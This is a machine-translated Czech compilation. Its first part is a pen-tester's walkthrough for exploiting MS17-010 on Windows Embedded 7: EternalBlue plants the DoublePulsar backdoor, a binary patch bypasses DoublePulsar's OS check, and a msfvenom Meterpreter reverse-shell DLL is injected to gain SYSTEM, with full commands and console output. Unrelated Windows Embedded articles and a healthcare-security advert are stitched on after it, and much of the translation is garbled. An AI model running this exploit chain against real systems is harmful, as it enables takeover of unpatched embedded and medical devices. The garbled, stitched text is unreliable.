
Využití MS17-010 na Windows Embedded 7 zařízení
Nedávná vlna útoků WannaCry Ransomware vrhla mnoho veřejného světla na zranitelnost provádění vzdáleného kódu Windows SMB na opravu MS17-010 a naštěstí vyústila v organizace, které uplatňují aktualizaci zabezpečení, aby zabránily dalším infekcím, aby zabránily dalším infekcím, aby zabránily dalším infekcím. Zatímco se hodně zaměřila na oprava stolních počítačů a serverů, pro mnoho organizací je snadné pokračovat v zanedbávání zařízení spuštěných okna vloženým 7 OS.
Blížím se dokončením velmi dlouhého a složitého testu pera prostředí tvořeného zcela síťovým zabudovaným zařízením, takže když byl Fuzzbunch Framework propuštěn veřejně, usoudil jsem, že by bylo perfektní pro několik krabic, které jsem se snažil získat kompletní přístup k.
Potřeboval jsem udělat nějaké vylepšení, abych dostal aktuální nástroje do práce, ale nakonec útok fungoval podle očekávání a pravděpodobně bude i nadále pracovat po dlouhou dobu vzhledem k obecnému nedostatku záplatování zabudovaných zařízení. Při této cvičení jsem zjistil, že následující příspěvky jsou zvláště užitečné, tolik díky autorům!
Selhané pokusy o vykořisťování
Nejprve jsem se pokusil použít modul Exploit/Windows/SMB/MS17_010_ETERNALBLUE. Nakonec jsem zjistil, že v tuto chvíli byl přenesen pouze na x64 a autoři jasně uvádějí, že pokusy o využití zařízení X86 jej zhroutí.
Pak jsem si myslel, že půjdu rovnou do rámce FuzzBench, o kterém vím, že pracuje proti zařízením x86. Pomocí nástroje EternalBlue jsem byl schopen snadno zasadit backdoor, ale implantát s dvojitým přístupem nebyl vyvinut s ohledem na Windows zabudovaný 7 a pokusy o vykořisťování by vyvolaly chybu při provedení:
[?] Spusťte plugin? [ANO]: [] SPECÍT PLUGINEM [] Vybraný protokol SMB [.] Připojení k cíli. [] Připojeno k cíli, pinging backdoor. [] Backdoor vrátil kód: 10. Úspěch! [] Ping vrátil cílovou architekturu: x86 (32-bit). Klávesa XOR: 0xed937c35 SMB připojení String je: Windows Embedded Standard 7601 Service Pack 1 [-] Chyba nerozpoznaná řetězec OS Target SP je: 1 [!] Plugin selhal [-] Chyba: Podařilo se selhalo FB užitečné zatížení (doublepulsar)
Přehled útoku
V tomto okamžiku jsem si myslel, že mou nejlepší možností by bylo, aby se původní implantát Eplantátu DoublePulsar fungoval pro mé potřeby místo toho, abych se pokusil všeho inženýra všeho a vytvořil svůj vlastní útok od nuly. Nebudu do hloubky na pozadí těchto příkazů, protože dva příspěvky, na které jsem se propojil výše.
Nastavení prostředí
Pro tento průchod mám tři virtuální virtuální počítače takto:
- Kali. Útok posluchače Meterpreter VM (172.16.16.200)
- Windows 7. Fuzzbunch Attack VM (172.16.16.201)
- Windows Embedded Standard 7. Oběť VM (172.16.16.202)
Počáteční výsadba zadních dveří
Počáteční útok je proveden z útočného pole Win7 pomocí útoku EternalBlue v rámci Fuzzbunch s minimálními odchylkami od výchozích hodnot:
[?] Výchozí cílová adresa IP []: 172.16.16.202 [?] Výchozí IP adresa zpětného volání []: 172.16.16.201 [?] Použijte přesměrování [ano]: Ne [?] Základní adresář protokolu [C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Logs]: [] Kontrola C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Logs Pro projekt Projects 0 Vytvořit nový projekt [?] Projekt [0]: 0 [[?] Nový název projektu: věčný Blue [?] Nastavte adresář cílového protokolu na ‚C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Logs \ EternalBlue \ Z172.16.16.202 ‚? [Ano]: [] Inicializace globálního stavu [] set cílop = 172.16.16.202 [] Set Callbackip = 172.16.16.201 [!] Přesměrování vypnuty [] SET LOGDIR = C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Logs \ EternalBlue \ Z172.16.16.202]!] Zadávání kontextu pluginu :: věčné Blue [] Použití globálních proměnných [] Set NetworkTimeout = 60 [] SET TIGALIP = 172.16.16.202 [] Použití parametrů relace [] Běh spuštění doteků [!] Zadejte rychlý režim :: EternalBlue Module: EternalBlue = Hodnota name.-. NetworkTimeout 60 TargetIp 172.16.16.202 TargetPort 445 OVERIFYTARGET TRUE VERIFYBACKDOOR TRUE MAXEXPLOITTATTRETS 3 GREOMALLocations 12 Target Win72K8R2 [!] proměnné pluginu jsou platné [?] Výzva pro nastavení proměnných? [Ano]: [] NetworkTimeout :: Timeout pro blokování síťových hovorů (v sekundách). Použití.1 za žádný časový limit. [?] NetworkTimeout [60]: [] TargetIp :: Cílová IP adresa [?] TargetIP [172.16.16.202]: [] Targetport :: port používaný službou SMB pro využití připojení [?] Targetport [445]: [] VerifyTarget :: Ověřte řetězec SMB z cíle proti cíli vybranému před vykořisťováním. [?] VerrifyTarget [True]: False [] Nastavit ověřeníTarget = false [] ověřenímBackDoor :: ověřte přítomnost backdoor dvojitého pulsaru před házením. Tato možnost musí být povolena pro více pokusů o vykořisťování. [?] OVERIFYBACKDOOR [TRUE]: [] MaxexploitaTTETTRSS :: Početkrát se pokusit o vykořisťování a ženicha. Zakázáno pro XP/2K3. [?] MaxExploiTaTTETS [3]: [] Groomallocations :: Počet velkých vyrovnávacích pamětí SMBV2 (Vista) nebo SessionSeTup (XK/2K3). [?] Groomallocations [12]: [] Target :: Operační systém, servisní balíček a architektura cílového OS 0) XP Windows XP 32bitové všechny servisní balíčky 1) Win72K8R2 Windows 7 a 2008 R2 32-bit a 64bitové služby vše Balíčky [?] Cíl [1]: [!] Příprava na provedení eternalblue [] režim :: mechanismus doručení 0) Dane Forward nasazení přes Daringneophyte 1) FB tradiční nasazení z Fuzzbunch [?Režim] Režim [0]: 1 [] Režim běhu: FB [?] Tím se provede lokálně jako tradiční pluginy Fuzzbunch. jsi si jistá? (Y/N) [Ano]: [] Přesměrování [] Konfigurujte lokální tunely pluginu [] místní tunel. místní tunel-1 [?] Cíl IP [172.16.16.202]: [?] Cílový port [445]: [] (TCP) Local 172.16.16.202: 445].-. DaveProxyport 0 NetworkTimeout 60 TargetIP 172.16.16.202 Targetport 445 OVERIFYTARGET FALSE VERIFYBACKDOOR TRUE MAXEXPLOITTaTTETSS 3 GREOMALLocations 12 ShellCodeBuffer Target Win72K8R2 [?] Spusťte plugin? [ANO]: [] provádění pluginu [] Připojení k cíli pro vykořisťování. [] Připojení pro vykořisťování. [] Pinging Backdoor. [] Backdoor není nainstalován, hra na. [] Budova Exploit vyrovnávací paměť [] Odesílání všech kromě posledního fragmentu vykořisťovaného paketu. [] Odeslání požadavku SMB Echo [] Dobrá odpověď od SMB Echo Request [] Spuštění ne-stránkované fondy fand [] Odesílání provedených vyrovnávacích pamětí SMBV2. [] Odesílání velké vyrovnávací paměti SMBV1.HOTOVO. [] Odesílání konečných vyrovnávacích pamětí SMBV2. HOTOVO. [] Uzavření připojení SMBV1 Vytvoření volného díry sousedící s vyrovnávací pamětí SMBV2. [] Odeslání požadavku SMB Echo [] Dobrá odpověď od SMB Echo Request [] Odeslání posledního fragmentu exploit paketu! HOTOVO. [] Přijímání odpovědi od Exploit Packet [] EternalBlue Overwrite úspěšně (0xc000000d)! [] Posílání vajíčka do poškozeného spojení. [] Spuštění bez poškozeného vyrovnávací paměti. [] Pinging Backdoor. [] Backdoor vrátil kód: 10. Úspěch! [] Ping returned Target architecture: x86 (32-bit) [] Backdoor installed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-= =.=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=.= [] Jádro odeslané serializované výstupní blob (2 bajty): 0x00000000 08 00. [] Přijaté výstupní parametry od jádra [] Core ukončené se stavovým kódem 0x00000000 [] EternalBlue uspěl FB Special (EternalBlue)
Nastavení meterpreter
Nejprve spustíme posluchače v relaci obrazovky na krabici Kali, aby počkal, až oběť zavolá zpět na.
obrazovka.S posluchači MSFConsole.q.x „Použijte Exploit/Multi/Handler; Nastavte okna užitečného zatížení/meterpreter/reverse_tcp; set lhost 172.16.16.200; set Lport 4444; běh; výstup.y “
Relace obrazovky může být oddělena (vlevo běh) zasažením ctrl-a d.
Dále musíme připravit meterpreter DLL pro injekci pomocí msfvenom na krabici Kali.
msfvenom.P Windows/Meterpreter/Reverse_TCP.f dll.O /TMP /MET_LAUNCHER_4444.DLL ExitFunc = vlákno lhost = 172.16.16.200 lport = 4444
Budeme muset dostat DLL do útoku Win7, takže můj preferovaný způsob, jak toho dosáhnout v mé vlastní síti, je:
obrazovka.S Web CD /TMP Python.M SimplehttpServer 8000
Opět lze relaci obrazovky oddělit (vlevo běh) zasažením Ctrl-A D.
Nyní na útoku na vítězství 7, právě otevřeme prohlížeč na http: // 172.16.16.200: 8000 a uložte met_launcher_4444.Soubor DLL na C: \ met_launcher_4444.dll.
Úpravy dvojitého přístavu pro Windows vložené 7
Nezapomeňte, že když spulsar běžel proti zařízení vloženého Windows 7, vyústil v chybovou zprávu: [-] Chyba nerozpoznaná řetězec OS OS.
Pojďme tedy otevřít doublepulsar-1.3.1.Exe spustitelný (nalezený v \ Windows \ Payloads \ podadresář souborů ShadowBroker) v IDA, aby zjistil, proč je tato chybová zpráva generována, a pokuste se ji opravit tak, aby pracovala s jinými verzemi OS verze.
Vidíme řetězec na 0x00406148:
Poklepáním na řetězec to přinese v.RDATA sekce:
Poklepáním na sekci Data XREF ji vynese do.textová část. Klepnutí pravým tlačítkem myši a výběr pohledu grafu poskytne lepší představu o toku této rutiny.
To nám dává graf, který vypadá velmi slibně pro něco jako rutina pro kontrolu verze OS. Všimněte si, že část, na kterou jsme skočili, je v pravém dolním rohu tohoto grafu, takže můžeme projít nahoru, abychom viděli, jak jsme se sem dostali.
O několik úrovní nahoru, najdeme kontrolu Windows 7. Problém, který máme, je, že náš řetězec verze OS neodpovídá tomu, který je zde zkontrolován, takže kód klesne na další kontrolu OS. Nejlepší věc, kterou je třeba udělat, by bylo přidat naši vlastní pobočku, abychom konkrétně zkontrolovali řetězec verze OS, kterou očekáváme, ale pro účely tohoto příspěvku si vezmu hroznou zkratku, abych zjistil, zda je tento útok dokonce životaschopný s OS předtím, než strávíte spoustu času, vytvoříte správnou opravu.
Takže nejjednodušší věcí, kterou je třeba udělat, je jednoduše změnit JZ na JNZ. Nejprve si zkontrolujeme, jaké jsou Opcodes pro JZ a JNZ, takže víme, co změnit. Vypadá to, že JZ je 74 a JNZ je 75.
Můžeme změnit bajty pomocí úprav | Patch Program | Změňte nabídku bajtů v IDA. Všimněte si, že začíná 74 opcode, který jsme očekávali. Jednoduše změna na 75 přepíná cestu, kterou program podniká, aby to nakopl cestu Win7. Opět je to opravdu hackerská a hrozná zkratka, ale po ověření této práce se můžeme vždy vrátit a vytvořit správnou opravu.
Nyní můžeme vidět aktualizovaný volání JNZ.
Abychom mohli opravit EXE, musíme nejprve vytvořit soubor DIF tím, že se chystáme souboru | Vytvořit soubor | Vytvořte soubor DIF. Poté můžeme použít skript @stalcR_ k opravě spustitelného souboru.
C: \ Users \ Admin \ Desktopc: \ Python26 \ Python.exe Idadif.Py C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Payloads \ Powerpulsar-1.3.1.EXE C: \ ShadowBroker \ ShadowBroker-Master \ Windows \ Payloads \ Emulpulsar-1.3.1.0.DIF Patching File ‚C: \\ ShadowBroker \\ ShadowBroker-Master \\ Windows \\ Payloads \\ EXTULSAR-1.3.1.exe ‚s‘ c: \\ ShadowBroker \\ ShadowBroker-Master \\ Windows \\ Payloads \\ EXTULSAR-1.3.1.0.Dif ‚hotovo
Proveďte užitečné zatížení doublepulsar a získejte metterpreter shell
Nyní, když máme na Kali nastavení posluchače a dll připraven k injekci, která přivede oběť zavolat zpět do Kali, vše, co zbývá udělat.
[!] Proměnné pluginu nejsou platné [?] Výzva pro nastavení proměnných? [Ano]: [] NetworkTimeout :: Timeout pro blokování síťových hovorů (v sekundách). Použití.1 za žádný časový limit. [?] NetworkTimeout [60]: [] TargetIp :: Cílová IP adresa [?] TargetIP [172.16.16.202]: [] Targetport :: Port používaný zadními dveřmi Pulsar [?] Targetport [445]: [] Protocol :: Protocol pro backdoor mluvit 0) SMB Prsten 0 SMB (TCP 445) Backdoor 1) RDP Prsten 0 RDP (TCP 3389) Backdoor [?] Protokol [0]: [] Architektura :: Architektura cílového OS 0) x86 x86 32 bitů 1) x64 x64 64 bitů [?] Architektura [0]: [] Funkce :: Operace pro backdoor pro provádění 0) výstup pouze na výstup instalační shell kód na binární soubor na disku. 1) Test ping na přítomnost backdoor 2) Rundll použijte APC k vložení DLL do procesu uživatelského režimu. 3) Ruský shellcode 4) Odinstalace Remove’s Backdoor ze systému [?] Funkce [0]: 2 [] SET FUNCTION = RUNDLL [] DllPayload :: DLL pro vstup do uživatelského režimu [?] DllPayload []: C: \ met_launcher_4444.dll [] dllordinal :: exportované pořadové číslo DLL, který je injikován k volání [?] Dllordinal [1]: [] ProcessName :: Název procesu, který se má vložit do [?] ProcessName [lsass.exe]: cívka.exe [] set processName = zamínka.exe [] ProcessCommandLine :: příkazový řádek procesu, aby se vložil do [?] ProcessCommandline []: [!] Příprava na provedení přesměrování DALLPULSAR [] OFF [] Konfigurujte lokální tunely pluginu [] místní tunel. místní tunel-1 [?] Cíl IP [172.16.16.202]: [?] Cílový port [445]: [] (TCP) Local 172.16.16.202: 445 [] Nakonfigurujte modul vzdálených tunelů plugin:.-. NetworkTimeout 60 TargetIp 172.16.16.202 Targetport 445 DllPayload C: \ met_launcher_4444.DLL DLORDINAL 1 ProcessName SPOOLSV.Exe ProcessCommandLine Protocol SMB Architecture X86 Function Rundll [?] Spusťte plugin? [ANO]: [] SPECÍT PLUGINEM [] Vybraný protokol SMB [.] Připojení k cíli. [] Připojeno k cíli, pinging backdoor. [] Backdoor vrátil kód: 10. Úspěch! [] Ping vrátil cílovou architekturu: x86 (32-bit). Klíč XOR: 0x6B075D17 SMB Connection String je: Windows Embedded Standard 7601 Service Pack 1 Target OS IS: 7 x86 Target SP je: 1 [] Backdoor Instalován [] DLL vytvořen [.] Odeslání shellcode k injekci dll [] Backdoor vrácené kód: 10. Úspěch! [] Backdoor vrátil kód: 10. Úspěch! [] Backdoor vrátil kód: 10. Úspěch! [] Příkaz dokončen úspěšně [] DoublePulsar uspěl FB Payload (doublepulsar)
Vypadá to, že to fungovalo, tak pojďme převrátit na naši obrazovku na krabici Kali.
A tady je naše meterpreter relace běžící pod systémovým účtem!
Aby se tento útok zlepšil, měl by být EXE DOUSTRULSAR SKUTEČNĚ oprava některým správným kódem a začlenit zpět do hlavního repora Github, ale to bude muset prozatím čekat. Bez ohledu na to vypadá to, že práce probíhá, aby útok napadl na x86 v Metasploit stejně, takže jakmile se to stane, bude mnohem snazší zaútočit na většinu vložených zařízení založených na Windows.
Dejte nám vědět, co si myslíte
Podělte se prosím o tento příspěvek, pokud je to užitečné a oslovte, pokud máte nějaké zpětné vazby nebo otázky!
Útok IoT Healthcare IoT se rozšiřuje pomocí systému Windows Embedded Standard 7 EOL
Microsoft v úterý 13. října 2020 odejde do důchodu svého operačního systému Windows Embedded Standard 7. Všechna zařízení a systémy, které běží, již nebudou dostávat aktualizace podpory nebo zabezpečení. Odchod do důchodu tohoto operačního systému sleduje systém Windows 7 a Windows Server 2008/R2 začátkem tohoto roku a ovlivňuje kritické lékařské systémy a zařízení.
Na podporu Národního měsíce CISA CISber Awareness nabízí Cynerio zařízení v Severní Americe do 31. října bezplatná hodnocení rizik do 31. října.
Ovlivněná zařízení
Windows Embedded Standard 7 se používá v mnoha kritických zdravotnických prostředcích poskytovaných množstvím dodavatelů (e.G. Philips, GE, Becton Dickson, Siemens, Hologic, Carestream, Ortho Clinical Diagnostics, Biomerieux), včetně laboratorních a zobrazovacích zařízení:
- Ultrazvuková zařízení
- Rentgenové stroje
- C-Arms
- Hematologické analyzátory
- Analyzátory krevního plynu
- Výdejní výdejní stanice
- Mikrobiální detekční zařízení
- Mamografické stroje
- DICOM pracovní stanice
- Biopsické systémy prsu
Co to znamená pro zdravotnická zařízení?
Pacienti, zdravotničtí pracovníci a notoricky zranitelný povrch útoku v tomto odvětví se znovu rozšíří. S odchodem do důchodu dalšího všudypřítomného okna Windows OS zůstanou v případě útoku nebo objevené zranitelnosti ponechány miliony kritických zdravotnických prostředků.
Ransomware a další zranitelnosti nejen riskují odhalení citlivých informací o zaměstnancích a Ephi špatným aktérům, ale způsobují zastavení nemocnice a dokonce ohrožují životy pacientů, jak je vidět při útocích proti UHS v USA a Duesseldorf University Hospital v Německu minulý měsíc.
Dále, odchod do důchodu Windows Embedded Standard 7 složený s nedávným únikem zdrojového kódu více starších oken OS (i.E. XP, Server 2003, DOS, CE a NT) zvyšuje riziko provozování dědických operačních systémů ještě více. Je pravděpodobné, že část staršího kódu přežila pozdější verze, což dále zvyšuje zranitelnost zařízení s některými z těchto systémů.
Jak vám může Cynerio pomoci zmírnit hrozbu?
Cynerio zmocňuje zdravotnická zařízení s poznatky a řešeními, která potřebují k praktikování proaktivní kybernetické bezpečnosti.
- Získejte plnou viditelnost do každého aktiva. Identifikujte každé zařízení, klasifikujte je, označte jakékoli infekce nebo známými zranitelnostmi a riziky
- Identifikujte všechna zařízení s nepodporovanými operačními systémy. Profil každé zařízení, identifikovat operační systémy, získat upozornění na hrozby v reálném čase
- Automatizovat hodnocení rizik. Využijte sílu AI a automatizované analýzy rizik každého postiženého aktiva, abyste pochopili jeho skóre rizika podle klinického dopadu a přijímají upozornění na slabá a výchozí hesla atd.
- Nakonfigurujte vlastní segmentační zásady
A. Navrhejte a prosazujte segmentační zásady segmentace na severu-jih, aby se zabránila zařízením v komunikaci se škodlivými aktéry v externích koncových bodech
b. Použijte zásady segmentace na východ-západní, abyste zabránili neautorizované komunikaci zařízení na zařízení v síti a omezili šíření infekce v případě kompromitovaného zařízení
Kontaktujte nás, abychom dnes získali své bezplatné posouzení rizik.
Udržujte prst na pulzu bezpečnosti IoT pro zdraví
Budoucnost Windows Embedded vypadá skalnatá
Ah, vložená okna. Operační systém Microsoft, který běží miliony zařízení a strojů, obvykle s vlastní aplikací nebo pokožkou, která se nachází na vrcholu, aby si uživatelé automaticky nevšimli OS. Operační systém, který podporuje stovky tisíc zdravotnických prostředků, automatických pokladních strojů, kiosků na letištích a dalších přeplněných veřejných místech, průmyslové stroje a kontrolní letadla, nastavení top boxů, herní konzole.
Windows Embedded je relativně neunheralded verze Windows, jejíž existence by vás mohla překvapit. Zdá se však, že existence Windows Embedded by mohla v Redmondu také překvapit mnoho lidí. Zde, v kampusu Microsoft, navzdory všem Hullabaloo o aktualizacích Windows 10 a zařízení.- A aktualizace nových tvůrců a verze Redstone, které sestoupí po štiku při téměř zlomené rychlosti.- Inbedded Windows trpí opačným problémem. Zdá se, že bohužel uvízl na místě, kde pro to nebyla jasně stanovena žádná budoucnost.
Jedním z indikací, že vložená Windows může být na cestě ven, je zavedení IoT Windows 10, které Microsoft začal tlačit jako náhrada. Nejprve však trochu na pozadí okna vestavěného.
Krátká historie Windows zabudovaných dosud
Jak v minulosti fungovalo vložení Windows? Většina dodavatelů si vybrala vložená okna, protože na rozdíl od tradičního operačního systému na stolním počítači to bylo modulární: můžete si vybrat, které funkce na instalaci nebo ne nainstalujte, a to, aby se snížila zátěž pro dodavatele (nepotřebujete solitaire na bankomatu pro, pro bankomat, for Příklad) a pro snížení povrchu potenciálního útoku, protože stroje laserových řezbářů obecně nepotřebují například schopnosti servírování webu IIS, například.
Modularita také zahrnovala schopnost přizpůsobit některé části operačního systému, které nebyly otevřeny úpravě v plné verzi, jako jsou splash obrazovky a filtry, takže byste mohli vložit vlastní značku nebo značku stroje přímo do OS. V podstatě jste chtěli svléknout operační systém, takže si můžete plně přizpůsobit hardware i software v systému a také ušetřit prostor na často omezených úložných médiích v zařízeních.
Jednalo se o nejnovější verze vestavěných oken:
- Windows Embedded Standard 7 (WES7): Windows Embedded Standard 7 byl v podstatě Windows 7 s různými částmi vytrženými a různými úrovní přizpůsobení schopnostem. Existovaly tři „zářezy“, které byly nazývány, C, E a P, z nichž každá označila různé přídavky funkcí do základního obrazu vloženého okna a měl odpovídajícím způsobem odlišné ceny. P byl nejdražší a byl v podstatě totožný s Windows 7 z pohledu funkcí.
- Windows Embedded 8 Standard (WE8S): Tím se vzalo vložený operační systém společnosti Microsoft, ale stáhl jej na Windows 8. Zbavil se také všech verzí C, E a P, takže pokud jste si koupili WE8, pak jste obdrželi oprávnění ke spuštění všech We8s.- A za to jste také zaplatili. Nemuseli jste používat všechny funkce a stále byste mohli vyřezávat části a provádět jakékoli požadované přizpůsobení, ale nemohli jste se odhlásit z některých funkcí a platit levnější cenu, a to ani.
Existovaly také verze, které přicházely s úplným předem vytvořeným obrazem okna vloženého a byly hlavně pro použití v jinak plném počítačích, které byly nasazeny v nastavení podobných zařízením, jako jsou zařízení pro prodej a pokladny, digitální značení nebo Tenké klienti, kteří se zaváděli pouze pro připojení k plné uživatelské relaci spuštěné na nějakém jiném stroji.
Zabudováno do internetu věcí
Nyní se Microsoft rozhodl, že pokud chcete stavět zařízení a velké stroje z diskrétních komponent, to, co opravdu stavíte, je věc. Pojmenování je kývnutím na internet věcí (IoT), kde jsou reflektory na vozovce a senzory v chladničce připojeny k internetu a mají „inteligentní“ schopnosti.
Skutečností je, že verze IoT v systému Windows 10 jsou nahrazením pro linii vložených SKU v systému Windows, které již dříve existovaly. Nyní existují tři edice verze IoT Windows 10 a každá z nich je navržena pro různé faktory formy zařízení takto:

- Jádro IoT Windows 10, pro malá zařízení: Tato verze Windows 10 nemá žádnou skořápku a v podstatě podporuje pouze univerzální aplikace.- ty, kteří se kódovali v spravovaném prostředí platformy Universal Windows (UWP) a ne Tradiční aplikace X86 nebo X64. Tato verze OS má maximálně 256 MB RAM a 2 GB úložiště zařízení a může běžet na platformě Chip X86 nebo na platformě ARM pro zařízení s nízkým výkonem. V současné době je to jediná vydání IoT Windows 10, které lze získat přímo koncovými uživateli.
- Windows 10 IoT Mobile Enterprise, pro mobilní zařízení: Tato verze Windows 10 přidává skořápku „tablet“.- Kůže, ve které provozujete aplikace z Windows Store.- a také podporuje univerzální aplikace a ovladače. Podpora úložiště a paměti se zdvojnásobí, ale tuto verzi Windows 10 můžete spustit pouze na zařízeních založených na ARM; Neexistuje žádná podpora čipů x86. Mobilní podnik IoT Windows 10 IoT je speciálně určen pro použití s mobilními a kapesními systémy s velikostí zobrazení menší než osm palců. Mysli na skenery sloupce, automobilové testery, ovládací polštářky a podobně. Toto vydání Windows 10 IoT je k dispozici pouze pro výrobce OEM a stavitelů systému.
- Windows 10 IoT Enterprise, pro průmyslová zařízení: Tato verze Windows 10 přináší tradiční stolní skořápku zpět do roztržce, zdvojnásobí paměť a čtyřnásobku RAM podporovanou OS. Přidává také podporu platformy Chip X86, ale odstraňuje podporu ARM. Toto vydání Windows 10 IoT je k dispozici pouze pro výrobce OEM a stavitelů systému.
Životní cyklus Windows 10 IoT Enterprise je: Poskytněte pět let pravidelné produkční podpory plus dalších pět let po rozšířené podpoře pouze pro aktualizaci zabezpečení. Pro ty, kteří jsou obeznámeni s větvemi Windows 10, jedná se o dlouhodobou servisní větev nebo LTSB, volba. Toto vydání také zahrnuje odloženou online aktivaci, Unified Write Filtr, Embedded Boot Experience a přihlášení (přizpůsobitelné splachové obrazovky a sekvence spouštěcí sekvence) a spouštěč Windows Shell Launcher.
Jedna zajímavá poznámka: Podle přímého nahlédnutí vytvořila společnost Microsoft tři úrovně licenčních cen pro Windows 10 IoT Enterprise: a) vstup, který se zaměřuje na nižší procesory výkonu, jako je atom a celeron, a poskytuje 75% snížení nákladů; (b) hodnota, která se zaměřuje na procesory Intel Core i3, Core i5 a Core M s 50% snížením nákladů; a (c) High End, zacílení na jádro i7 a Xeon, bez snížení nákladů.
Důsledky těchto dělení mezi vydáními IoT Windows 10 jsou zcela jasné.

- Pokud chcete používat Windows na zařízení založeném na ARM, můžete použít pouze vydání „Malá zařízení“ nebo „Mobilní zařízení“, protože plné vydání není ještě připraveno ke spuštění na platformě ARM.
- Pokud chcete stavět mobilní zařízení s více než 256 MB RAM, měli lépe podporovat platformu ARM, protože v edici není žádná podpora čipů X86, která podporuje více RAM než tohle.
- Pokud chcete více než 4 GB úložiště, jednáte s čipy x86, pokud jde o vložená okna.
- Pokud chcete poskytnout operační systém pro jednobodová řešení nebo velmi malá zabudovaná zařízení, pak by mohla být vhodná edice Windows 10 IoT Core Edition. Nejčastějším cílem tohoto typu vývoje se zdá být fandové pracující s Raspberry Pi a dalšími jednorázovými zařízeními.- Tito „výrobci“ jsou opravdu na koho je jádro zaměřeno, ačkoliv není jen málo brání jeho používání v jiných aplikacích a scénářích.
Zdá se také, že uživatelé ztratili možnost zakoupit si verzi IoT Windows 10, což bylo pro Windows 7 Professional pro vložené systémy a Windows vloženo 8.1 Pro. To byla v podstatě funkce, která vám umožnila licencovat úplnou instalaci Windows na systém, který byl součástí většího zařízení. Samotný operační systém by mohl být standardní, stejná kopie systému Windows 7 nebo 8, ale protože to byla součást většího systému nebo stroje, můžete mu přiřadit levnější licenci.
Zdá se, že pro Windows 10 IoT se zdá, že žádná taková možnost neexistuje, ačkoli nic nebrání společnosti Microsoft v tom, aby tuto starou praxi vrátilo zpět do dostupnosti.
Co se mění? Důsledky
U aplikací, které v současné době běží na vložení systému Windows, které nejsou univerzálními aplikacemi Windows, ale které jsou místo toho standardní aplikace X86, je obtížné vidět jakoukoli výhodu pro vydání IoT Windows 10, s výjimkou možná verze Enterprise verze. Ostatní vydání jsou v podstatě pouze operační systémy Stub, které mohou provozovat omezené aplikace, které chápou, jak provádět volání API Windows API a interpretovat výsledky.
Zatímco vývojáři mohou snadno zacílit na každou z IoT vydání Windows 10 v rámci Visual Studio, přenosu stávajících aplikací X86 na univerzální platformu Windows je zcela dalším projektem. A obnovení stávajících aplikací od nuly jen po Meld k nové vizi společnosti Microsoft o tom, jak by měly vypadat vložené operační systémy, je zcela jiná otázka.- ten, který by vyžadoval určité ospravedlnění a některé návraty času a peněz investovaných do úsilí o přenos.
To nejlepší, co lze říci o těchto vydáních IoT Windows 10, je to, že se jedná o doplňky, augmentace a rozšíření vložené platformy Windows a že umožňují nové aplikace. Zdá se nepravděpodobné, že Chase Bank nebo American Airlines přepsá svůj software ATM nebo Kiosk, aby se zaměřili na univerzální operační systémy schopné platformy Windows, zejména když v tomto okamžiku mají aplikace UWP schopnosti, které jsou podmnožinou úplných aplikací X86 (což je, což je Pravděpodobně to, co tyto společnosti v současné době běží). Tyto aplikace také nebudou obecně běžet na platformě ARM, takže tyto společnosti pravděpodobně zůstanou s tím, co vědí a co funguje dobře, alespoň pro jejich stávající aplikace.
Z tohoto důvodu je nepravděpodobné, že IoT Windows 10 bude nahradit Windows Embedded 7 a 8. Místo toho bychom mohli vidět, jak Chase Bank vyvíjí nový platební stroj pomocí API Windows 10 nebo American Airlines nasazující nové značky RFID, které provozují Windows 10 IoT.
Otázka se pak stane: je to víc než hra IoT? Je Windows 10 IoT hra, aby se Windows vrátila zpět na paži? Okamžitě přijdou odstíny nešťastného operačního systému Windows RT a povrchu RT, ale je těžké nakreslit srovnání. Windows byla po celá desetiletí výhradně x86. Linux má na druhé straně pulzující komunitu kolem čipové sady paže a má dostupné kompletní úložiště softwaru a balíčků k běhu na paži.
Microsoft právě začíná v paži a jeho jediný vstup do paže nekončil dobře (můžete říci, že miliarda dolaru zapisovala?). Je to další výlet do ničeho?
Další otázka: Jaký je plán pro ty, kteří jsou v současné době spuštěni okna? Zdá se, že toto prohlášení společnosti Microsoft matoucí naznačuje na konci přicházející podpory: „Do 17. července 2017 zařízení Skylake se vloženými oknami vestavěná 7, 8 a 8.1 bude podporován podle zásad podpory životního cyklu pro tyto produkty. Během 18měsíční podpůrné doby by tyto systémy měly být upgradovány na Windows 10, aby se po skončení období pokračovaly v přijímání podpory. Po červenci 2017 budou pro tyto konfigurace řešeny nejkritičtější aktualizace zabezpečení a budou zveřejněny, pokud aktualizace riskuje spolehlivost nebo kompatibilitu okna zabudovaného 7. 8. 8.8.1 platforma na jiných zařízeních.“
Hodně je stále nejasné. Existuje však spousta zařízení a systémů větší než Raspberry Pi, ale odlišné od plné plochy, které by použil typický znalostní pracovník, a tato vydání IoT Windows 10 se nezdá být plně nahrazením pro vložené verze Windows, které byste si vybrali Tyto aplikace až dosud. Kupující si dávejte pozor.
Windows Embedded Standard 7 vs Windows 10 IoT
Všichni inženýři vám řeknou to samé: Windows Embedded Standard 7 je vyzkoušený, důvěryhodný a stabilní vložený operační systém, který šťastně používali roky. Ale protože společnost Microsoft oznámila konec Windows Embedded Standard 7, slyšel jsem tuto otázku hodně!
„Měl bych se držet WES 7. Zkoušeného, důvěryhodného a stabilního zabudovaného OS. nebo vstoupit do (srovnávací neznámé) Windows 10 IoT?“
O kterých verzích IoT mluvíme?
První věc nejprve, skutečná „zabudovaná“ verze systému Windows 10 IOT je LTSB (dlouhodobá pobočka služby). Pokud máte konkrétní otázky týkající se CB a CBB, přečtěte si tento článek.
Обновление через ВСЕ выпуски Windows 10

Pro nové projekty
Obecně má smysl specifikovat nejnovější operační systém pro nové projekty. IoT Windows 10 byl navržen speciálně pro připojené prostředí IoT a výhody z nejnovějšího myšlení v oblasti zabezpečení a výkonu (čas, úložiště, správa souborů. ). Pokud začínáte nový projekt, doporučujeme nový operační systém. Aby vám pomohl vybrat, Microsoft nabízí dvě mrkve a jednu hůlku. Zjistěte více zde.
Microsoft Windows Embedded Standard 7
Existující migrace projektů?
